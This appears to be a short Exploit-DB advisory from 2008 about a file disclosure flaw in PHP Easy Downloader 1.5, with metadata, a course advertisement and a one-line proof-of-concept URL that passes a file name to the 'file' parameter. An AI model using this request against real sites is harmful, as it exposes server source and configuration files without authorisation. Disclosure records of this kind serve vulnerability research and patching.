PHP Easy Downloader 1.5 - 'file' File Disclosure

EDB-ID:

6770

CVE:

N/A


Author:

LMaster

Type:

webapps


Platform:

PHP

Date:

2008-10-16


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

::::::::::::::::::::R3AL.RU::::::::::::::::::::

PHP Easy Downloader <= 1.5 Remote File Download

Author: LMaster

Greetz: Pogozheva Irina Borisovna and r3al.ru

Download:

http://www.hasemithut.de/downloads/index.php

Exploit:

http://www.target.com/phpeasydownloader/index.php?file=index.php

# milw0rm.com [2008-10-16]